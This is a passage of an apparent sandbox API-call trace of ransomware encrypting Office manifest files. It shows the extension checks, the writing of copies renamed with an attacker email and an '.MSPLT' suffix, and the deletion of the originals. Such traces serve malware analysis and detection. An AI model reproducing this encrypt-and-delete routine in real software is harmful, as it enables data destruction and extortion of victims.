-1 [0177.244] lstrlenW (lpString=".bz2") returned 4 [0177.244] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString=".7z") returned 3 [0177.244] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.244] lstrlenW (lpString=".dbf") returned 4 [0177.244] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.244] lstrlenW (lpString=".1cd") returned 4 [0177.244] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.244] lstrlenW (lpString=".jpg") returned 4 [0177.244] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.244] lstrlenW (lpString=".doc") returned 4 [0177.244] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString=".docx") returned 5 [0177.244] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.244] lstrlenW (lpString=".pdf") returned 4 [0177.244] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString=".xls") returned 4 [0177.245] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString=".xlsx") returned 5 [0177.245] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.245] lstrlenW (lpString=".ppt") returned 4 [0177.245] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.245] lstrlenW (lpString=".zip") returned 4 [0177.245] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.245] lstrlenW (lpString=".rar") returned 4 [0177.245] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString=".bz2") returned 4 [0177.245] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString=".7z") returned 3 [0177.245] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.245] lstrlenW (lpString=".dbf") returned 4 [0177.245] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.245] lstrlenW (lpString=".1cd") returned 4 [0177.245] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.245] lstrlenW (lpString=".jpg") returned 4 [0177.245] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.245] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.245] lstrlenW (lpString="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 53 [0177.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.246] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=2147) returned 1 [0177.246] CloseHandle (hObject=0x384) returned 1 [0177.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 0x220 [0177.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.246] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.246] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0177.247] GetLastError () returned 0x0 [0177.247] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x863, lpOverlapped=0x0) returned 1 [0179.747] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x870, lpOverlapped=0x0) returned 1 [0179.802] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0179.805] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0179.806] SetEndOfFile (hFile=0x2fc) returned 1 [0179.806] CloseHandle (hObject=0x2fc) returned 1 [0179.808] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0179.808] SetEndOfFile (hFile=0x384) returned 1 [0179.819] CloseHandle (hObject=0x384) returned 1 [0179.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0179.820] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 1 [0179.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.836] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.836] lstrlenW (lpString=".doc") returned 4 [0179.836] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.836] lstrlenW (lpString=".docx") returned 5 [0179.836] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0179.836] lstrlenW (lpString=".pdf") returned 4 [0179.836] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.836] lstrlenW (lpString=".xls") returned 4 [0179.836] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.836] lstrlenW (lpString=".xlsx") returned 5 [0179.837] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0179.837] lstrlenW (lpString=".ppt") returned 4 [0179.837] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.837] lstrlenW (lpString=".zip") returned 4 [0179.837] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.837] lstrlenW (lpString=".rar") returned 4 [0179.837] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString=".bz2") returned 4 [0179.837] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString=".7z") returned 3 [0179.837] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.837] lstrlenW (lpString=".dbf") returned 4 [0179.837] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.837] lstrlenW (lpString=".1cd") returned 4 [0179.837] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.837] lstrlenW (lpString=".jpg") returned 4 [0179.837] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.837] lstrlenW (lpString=".doc") returned 4 [0179.837] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.837] lstrlenW (lpString=".docx") returned 5 [0179.838] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0179.838] lstrlenW (lpString=".pdf") returned 4 [0179.838] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.838] lstrlenW (lpString=".xls") returned 4 [0179.838] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.838] lstrlenW (lpString=".xlsx") returned 5 [0179.838] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0179.838] lstrlenW (lpString=".ppt") returned 4 [0179.838] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.838] lstrlenW (lpString=".zip") returned 4 [0179.838] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.838] lstrlenW (lpString=".rar") returned 4 [0179.838] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.838] lstrlenW (lpString=".bz2") returned 4 [0179.838] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.838] lstrlenW (lpString=".7z") returned 3 [0179.838] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.838] lstrlenW (lpString=".dbf") returned 4 [0179.838] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.838] lstrlenW (lpString=".1cd") returned 4 [0179.838] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0179.839] lstrlenW (lpString=".jpg") returned 4 [0179.839] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.839] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0179.839] lstrlenW (lpString="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 53 [0179.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0179.848] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=215883) returned 1 [0179.848] CloseHandle (hObject=0x388) returned 1 [0179.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 0x220 [0179.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0179.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0179.849] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0179.849] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0179.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.428] GetLastError () returned 0x0 [0181.428] ReadFile (in: hFile=0x388, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x34b4b, lpOverlapped=0x0) returned 1 [0181.509] WriteFile (in: hFile=0x350, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x34b50, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x34b50, lpOverlapped=0x0) returned 1 [0181.517] ReadFile (in: hFile=0x388, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0181.517] WriteFile (in: hFile=0x350, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0181.517] SetEndOfFile (hFile=0x350) returned 1 [0181.517] CloseHandle (hObject=0x350) returned 1 [0181.527] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.527] SetEndOfFile (hFile=0x388) returned 1 [0181.530] CloseHandle (hObject=0x388) returned 1 [0181.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0181.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 1 [0181.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.531] lstrlenW (lpString=".doc") returned 4 [0181.531] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.531] lstrlenW (lpString=".docx") returned 5 [0181.531] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.531] lstrlenW (lpString=".pdf") returned 4 [0181.531] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.531] lstrlenW (lpString=".xls") returned 4 [0181.531] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString=".xlsx") returned 5 [0181.532] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.532] lstrlenW (lpString=".ppt") returned 4 [0181.532] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.532] lstrlenW (lpString=".zip") returned 4 [0181.532] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.532] lstrlenW (lpString=".rar") returned 4 [0181.532] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString=".bz2") returned 4 [0181.532] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString=".7z") returned 3 [0181.532] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.532] lstrlenW (lpString=".dbf") returned 4 [0181.532] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.532] lstrlenW (lpString=".1cd") returned 4 [0181.532] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.532] lstrlenW (lpString=".jpg") returned 4 [0181.532] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.532] lstrlenW (lpString=".doc") returned 4 [0181.532] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString=".docx") returned 5 [0181.532] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.532] lstrlenW (lpString=".pdf") returned 4 [0181.532] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString=".xls") returned 4 [0181.532] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.532] lstrlenW (lpString=".xlsx") returned 5 [0181.532] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.533] lstrlenW (lpString=".ppt") returned 4 [0181.533] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.533] lstrlenW (lpString=".zip") returned 4 [0181.533] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.533] lstrlenW (lpString=".rar") returned 4 [0181.533] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.533] lstrlenW (lpString=".bz2") returned 4 [0181.533] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.533] lstrlenW (lpString=".7z") returned 3 [0181.533] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.533] lstrlenW (lpString=".dbf") returned 4 [0181.533] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.533] lstrlenW (lpString=".1cd") returned 4 [0181.533] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0181.533] lstrlenW (lpString=".jpg") returned 4 [0181.533] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.533] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.533] lstrlenW (lpString="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 53 [0181.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.546] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1261) returned 1 [0181.546] CloseHandle (hObject=0x378) returned 1 [0181.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 0x220 [0181.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.547] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.547] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.548] GetLastError () returned 0x0 [0181.548] ReadFile (in: hFile=0x378, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x4ed, lpOverlapped=0x0) returned 1 [0181.637] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x4f0, lpOverlapped=0x0) returned 1 [0181.644] ReadFile (in: hFile=0x378, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0181.644] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0181.644] SetEndOfFile (hFile=0x358) returned 1 [0181.700] CloseHandle (hObject=0x358) returned 1 [0181.702] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.702] SetEndOfFile (hFile=0x378) returned 1 [0181.703] CloseHandle (hObject=0x378) returned 1 [0181.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0181.704] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft 